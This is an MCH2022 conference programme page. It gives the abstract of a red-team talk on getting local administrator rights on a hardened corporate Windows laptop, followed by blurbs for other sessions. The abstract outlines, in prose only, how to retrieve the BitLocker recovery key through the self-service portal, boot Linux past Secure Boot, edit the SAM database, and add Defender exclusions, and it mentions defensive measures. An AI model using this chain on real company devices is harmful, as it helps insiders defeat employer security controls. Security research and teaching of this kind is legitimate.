MCH2022 Curated content

Hacking Corporate Windows Laptops in 2022

Abacus 🧮
Wiebe Willems
It’s interesting to see how new, recent technologies such as Microsoft Intune might be used to nullify endpoint security solutions such as Microsoft Defender for Endpoint, the big brother of Microsoft Defender. In this talk, we start from the perspective of a malicious insider in a company. He obviously has low-privileged access to his own laptop/workstation, which has been carefully hardened using modern endpoint protections such as Microsoft Defender for Endpoint, BitLocker and Secure Boot. Nowadays, central management of these tools is a must to ease the management of all the company’s workstations. This is the ideal target for a malicious insider to gain local administrative access over his laptop. We want to show you a proof of concept where a malicious insider can gain administrative access within 10 minutes while only having access to his BitLocker recovery key, managed by Microsoft Intune & Azure Active Directory, defeating all the workstation’s hardening measures in place. We will start with a real attack scenario that was part of one of our red team engagements and explain the steps we took to obtain local administrative privileges on the end user’s workstation. We start by showing how a malicious insider can retrieve the BitLocker recovery key. Then, we bypass the default Secure Boot configuration to boot into an alternative operating system. This allows us to decrypt the BitLocker encrypted hard drive and use tools to gain control over the built-in local Administrator account. A thorough explanation including defensive measures are part of this talk as well.
This presentation is divided in 3 sections. First we are going to explain our attack scenario. Here, as a malicious insider, we have access our own user account and our own company-managed laptop. Since we are a new employee, we get the laptop configuration that the IT team of the company uses for every new laptop that is deployed in the company’s IT landscape. They know their business; they make use of an Endpoint Detection & Response (EDR) solution by Microsoft: Defender for Endpoint. Next to that, they configured BitLocker on their endpoints to prevent an attacker getting physical access to the laptop’s hard drive and being able to extract unencrypted data from the laptop. To be sure that no malicious USB sticks with Kali Linux can be used to bypass security measures on the laptop, they enable Secure Boot in the UEFI settings. Of course, they put an administrator password on the UEFI settings to prevent someone from altering the UEFI settings & simply disabling Secure Boot. Second, we will talk about how centrally managed cloud native services such as Microsoft Azure Active Directory and Microsoft Intune are working together to ease the management of endpoints in a company’s IT landscape. While a low-privileged user is blocked from accessing most of the management portals for these services, he can still access a platform where he is able to retrieve his BitLocker recovery key. This is called the BitLocker self-service portal. In a default configuration, a user can use this portal to retrieve his BitLocker recovery key without needing to have approval of IT to retrieve it. We now have access to the BitLocker recovery key and a well-secured company-managed endpoint device. What could go wrong? In the third section, we show how a default Secure Boot configuration allows a malicious insider, or attacker, can still boot into an alternative Linux operating system because the bootloader is signed by Microsoft itself! This allows the operating system to pass the Secure Boot check. Then, we can install malicious tools on this alternative Linux operating system to be able to interact with the BitLocker-encrypted built-in hard drive. Since we have the recovery key, we can easily decrypt and mount the Windows partition on this hard drive. Since we have full access to the operating system (remember, we’re root) we can use tools to modify the SAM database on the hard drive – this is where local users of the Windows installation are managed. This way, we can enable the local built-in Administrator account and set his password to an empty password! We write it to the hard drive, reboot to Windows et voila, we have administrative access over the laptop. We could even take it as far as adding exclusions to Microsoft Defender for Endpoint – essentially disabling it for that endpoint. During the talk, we will give a live demo, cover defensive measures that can be taken to hinder a malicious insider’s malintent and further cover the impact this attack might have in a corporate environment.

Additional information

Type Talk
Language English

More sessions

7/22/22
MCH2022 Curated content
Elger "Stitch" Jonker
Abacus 🧮
⚠️ Warning! This talk may contain hackers. There may be hackers in the room. There may be hackers surrounding the room. There may be hackers recording this. There may be hackers listening in. There may be hackers that exfiltrate data. There may be hackers wearing shirts. There may be hackers carrying spying devices. OH NO! There are hackers EVERYWHERE! What can we do now, except having a party?
7/22/22
MCH2022 Curated content
Jelle vd ster
Abacus 🧮
What do big tech, synthesizers, the crucifixion and Matthäus Passion have in common? Find the answer in the tech performance The Silicon Passion. We’ve all embraced big tech —but is it a warm hug or a strangulation? Bear witness to a debate of biblical proportions between tech nerds, technology and its users. In The Silicon Passion SETUP, in collaboration with de Transmissie (David Schwarz en Derk Stenvers) and Rodrigo Ferreira, is looking for a way out of the pit that technology has ...
7/22/22
MCH2022 Curated content
Clairvoyance 🔮
Lightning talks are a 5 to 10 minute quick talk on an interesting subject. They can be with or without slides, and with or without proper preparation. if you weren't accepted in the main CfP, this is also a great opportunity to give an abridged version of your talk. These sessions will be available to sign up to later on, with details on the wiki.
7/22/22
MCH2022 Curated content
Mikko Hypponen
Abacus 🧮
This is a submission for a keynote talk at MCH2022. The Internet is both a familiar, comfortable place as well as a bottomless rabbit hole you can lose yourself in. The Internet has always been like this from its inception, the difference now is the scale and consequences are almost immeasurable - and it tests the limits of human imagination. When you look into the mirror of the Internet what you see reflected back depends on what you are looking for. It has become largely a reflection of ...
7/22/22
MCH2022 Curated content
Battery 🔋
Thanks to DNSSEC and DANE, it is possible to automatically verify user@domain.name identities by checking with domain.name servers. The real problem however, is integration with existing protocols, instead of inventing something completely new and perhaps web-only. The purpose of our work on Realm Crossover mechanisms has been to design generic solutions that extend many different application protocols, without changing their protocol specs.
7/22/22
MCH2022 Curated content
Klaus Agnoletti
Clairvoyance 🔮
Utilizing collaborative security to collect data on attacks we were able to detect Log4J in a quite unusual but effective manner. We'll show you how CrowdSec enables the entire infosec community to stand together by detecting attempts to exploit a critical 0day, reporting them centrally thereby enabling anyone to protect themselves shortly after the vulnerability was made public. The unusual part is that this is done using FOSS software and by analyzing logs of real production systems but in a ...
7/22/22
MCH2022 Curated content
bert hubert
Abacus 🧮
Building on the very well attended DNA presentations ("DNA: The Code Of Life") at SHA2017, this talk will cover: * A brief recap what DNA is and how it works * It is surprisingly digital! * How reading DNA is within 'pro-sumer' reach now * (I might bring a live demo for after the talk) * An overview of DNA editing technologies (offline, and online: on living organisms) * Including the famous CRISPR-CAS, but also newer variants * How does such editing actually work in a lab? * The surprising lack ...